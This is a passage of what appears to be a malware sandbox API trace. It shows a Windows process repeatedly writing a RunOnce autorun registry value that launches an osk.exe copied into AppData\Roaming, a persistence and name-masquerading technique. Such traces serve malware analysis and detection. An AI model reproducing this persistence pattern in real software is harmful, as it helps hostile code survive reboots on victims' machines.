(lpMsg=0x33f7fc) returned 0 [0083.762] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.762] KillTimer (hWnd=0x20280, uIDEvent=0x2141) returned 1 [0083.763] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.763] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.763] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.763] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.763] RegCloseKey (hKey=0x280) returned 0x0 [0083.764] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.764] SetTimer (hWnd=0x20280, nIDEvent=0x2142, uElapse=0xa, lpTimerFunc=0x0) returned 0x2142 [0083.764] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.777] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.777] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.778] KillTimer (hWnd=0x20280, uIDEvent=0x2142) returned 1 [0083.778] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.778] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.778] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.778] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.779] RegCloseKey (hKey=0x280) returned 0x0 [0083.779] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.779] SetTimer (hWnd=0x20280, nIDEvent=0x2143, uElapse=0xa, lpTimerFunc=0x0) returned 0x2143 
[0083.779] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.793] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.793] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.793] KillTimer (hWnd=0x20280, uIDEvent=0x2143) returned 1 [0083.794] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.794] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.795] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.795] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.795] RegCloseKey (hKey=0x280) returned 0x0 [0083.795] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.795] SetTimer (hWnd=0x20280, nIDEvent=0x2144, uElapse=0xa, lpTimerFunc=0x0) returned 0x2144 [0083.796] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.809] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.809] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.809] KillTimer (hWnd=0x20280, uIDEvent=0x2144) returned 1 [0083.810] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.810] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.810] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.810] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.811] RegCloseKey (hKey=0x280) returned 0x0 [0083.811] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.811] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.811] SetTimer (hWnd=0x20280, nIDEvent=0x2145, uElapse=0xa, lpTimerFunc=0x0) returned 0x2145 [0083.811] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.824] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.824] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.825] KillTimer (hWnd=0x20280, uIDEvent=0x2145) returned 1 [0083.825] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.825] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.825] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.825] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.826] RegCloseKey (hKey=0x280) returned 0x0 [0083.826] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.826] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.826] SetTimer (hWnd=0x20280, nIDEvent=0x2146, uElapse=0xa, lpTimerFunc=0x0) returned 0x2146 [0083.826] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0083.840] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.840] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.840] KillTimer (hWnd=0x20280, uIDEvent=0x2146) returned 1 [0083.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.841] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.841] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.841] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.841] RegCloseKey (hKey=0x280) returned 0x0 [0083.841] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.841] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.841] SetTimer (hWnd=0x20280, nIDEvent=0x2147, uElapse=0xa, lpTimerFunc=0x0) returned 0x2147 [0083.842] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.855] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.855] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.856] KillTimer (hWnd=0x20280, uIDEvent=0x2147) returned 1 [0083.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.856] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.857] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.857] RegCloseKey (hKey=0x280) returned 0x0 [0083.857] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.857] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.857] SetTimer (hWnd=0x20280, nIDEvent=0x2148, uElapse=0xa, lpTimerFunc=0x0) returned 0x2148 [0083.857] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.871] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.872] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.872] KillTimer (hWnd=0x20280, uIDEvent=0x2148) returned 1 [0083.872] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.872] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.872] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.873] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.873] RegCloseKey (hKey=0x280) returned 0x0 [0083.873] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.873] SetTimer (hWnd=0x20280, nIDEvent=0x2149, uElapse=0xa, lpTimerFunc=0x0) returned 0x2149 [0083.873] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.887] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.887] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.887] KillTimer (hWnd=0x20280, uIDEvent=0x2149) returned 1 [0083.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.887] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.887] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.888] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.888] RegCloseKey (hKey=0x280) returned 0x0 [0083.888] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.888] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.888] SetTimer (hWnd=0x20280, nIDEvent=0x214a, uElapse=0xa, lpTimerFunc=0x0) returned 0x214a [0083.888] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.902] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.902] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.902] KillTimer (hWnd=0x20280, uIDEvent=0x214a) returned 1 [0083.903] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.903] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.903] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.903] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.903] RegCloseKey (hKey=0x280) returned 0x0 [0083.904] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.904] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.904] SetTimer (hWnd=0x20280, nIDEvent=0x214b, uElapse=0xa, lpTimerFunc=0x0) returned 0x214b [0083.904] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.918] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.918] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.918] KillTimer (hWnd=0x20280, uIDEvent=0x214b) returned 1 [0083.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.919] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.919] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.919] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.919] RegCloseKey (hKey=0x280) returned 0x0 [0083.919] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.919] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.919] SetTimer (hWnd=0x20280, nIDEvent=0x214c, uElapse=0xa, lpTimerFunc=0x0) returned 0x214c [0083.919] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.933] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.934] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.934] KillTimer (hWnd=0x20280, 
uIDEvent=0x214c) returned 1 [0083.934] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.934] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.934] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.935] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.935] RegCloseKey (hKey=0x280) returned 0x0 [0083.935] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.935] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.935] SetTimer (hWnd=0x20280, nIDEvent=0x214d, uElapse=0xa, lpTimerFunc=0x0) returned 0x214d [0083.935] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.950] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.950] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.950] KillTimer (hWnd=0x20280, uIDEvent=0x214d) returned 1 [0083.950] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.951] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.951] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.951] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.951] RegCloseKey (hKey=0x280) returned 0x0 [0083.951] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.951] SetTimer (hWnd=0x20280, nIDEvent=0x214e, uElapse=0xa, lpTimerFunc=0x0) returned 0x214e [0083.951] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.968] KillTimer (hWnd=0x20280, uIDEvent=0x214e) returned 1 [0083.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.969] RegCloseKey (hKey=0x280) returned 0x0 [0083.969] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.969] SetTimer (hWnd=0x20280, nIDEvent=0x214f, uElapse=0xa, lpTimerFunc=0x0) returned 0x214f [0083.969] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.981] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.981] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.981] KillTimer (hWnd=0x20280, uIDEvent=0x214f) returned 1 [0083.981] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0083.982] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.982] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.982] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.982] RegCloseKey (hKey=0x280) returned 0x0 [0083.982] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.982] SetTimer (hWnd=0x20280, nIDEvent=0x2150, uElapse=0xa, lpTimerFunc=0x0) returned 0x2150 [0083.982] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.996] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.996] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.996] KillTimer (hWnd=0x20280, uIDEvent=0x2150) returned 1 [0083.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.997] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.997] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.997] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.997] RegCloseKey (hKey=0x280) returned 0x0 
[0083.997] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.997] SetTimer (hWnd=0x20280, nIDEvent=0x2151, uElapse=0xa, lpTimerFunc=0x0) returned 0x2151 [0083.998] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.011] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.011] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.012] KillTimer (hWnd=0x20280, uIDEvent=0x2151) returned 1 [0084.012] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.012] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.012] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.013] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.013] RegCloseKey (hKey=0x280) returned 0x0 [0084.013] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.013] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.013] SetTimer (hWnd=0x20280, nIDEvent=0x2152, uElapse=0xa, lpTimerFunc=0x0) returned 0x2152 [0084.013] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.027] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.027] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.027] KillTimer (hWnd=0x20280, uIDEvent=0x2152) returned 1 [0084.028] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.028] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.028] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.028] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.029] RegCloseKey (hKey=0x280) returned 0x0 [0084.029] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.029] SetTimer (hWnd=0x20280, nIDEvent=0x2153, uElapse=0xa, lpTimerFunc=0x0) returned 0x2153 [0084.029] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.043] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.043] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.043] KillTimer (hWnd=0x20280, uIDEvent=0x2153) returned 1 [0084.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.044] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.044] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.044] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 